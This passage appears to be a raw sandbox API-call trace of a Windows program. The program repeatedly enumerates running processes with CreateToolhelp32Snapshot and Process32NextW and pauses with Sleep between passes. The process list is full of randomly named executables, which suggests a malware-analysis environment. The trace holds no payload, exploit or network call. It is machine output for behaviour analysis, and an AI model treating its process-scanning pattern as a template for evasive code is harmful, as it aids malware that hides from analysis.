szExeFile="xplivecam.exe")) returned 1 [0118.980] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0118.981] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0118.982] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0118.983] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0118.984] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0118.985] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0118.987] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0118.988] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0118.990] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0118.992] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0118.993] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0118.994] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0118.996] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0118.997] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0118.998] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0118.999] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0119.000] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.001] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0119.003] CloseHandle (hObject=0xc4) returned 1 [0119.003] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0119.008] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.008] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0119.009] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0119.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, 
dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0119.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0119.011] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0119.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0119.013] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0119.013] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0119.014] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0119.015] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0119.015] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.016] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.017] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.017] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.018] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0119.019] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.019] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0119.020] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0119.021] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.023] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0119.038] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0119.039] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0119.041] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0119.042] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0119.044] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0119.045] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0119.047] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0119.048] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0119.050] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0119.051] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0119.053] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0119.054] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0119.056] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0119.057] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0119.059] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0119.060] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0119.062] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0119.063] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0119.065] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0119.067] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0119.071] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0119.073] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0119.075] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0119.076] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0119.078] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0119.080] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.081] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0119.083] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0119.084] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0119.086] CloseHandle (hObject=0xbc) returned 1 [0119.086] Sleep (dwMilliseconds=0x12c) [0119.484] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0119.491] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="System")) returned 1 [0119.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0119.493] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0119.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0119.495] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0119.496] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0119.497] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0119.498] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="lsass.exe")) returned 1 [0119.498] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0119.499] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.500] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.502] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.502] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, 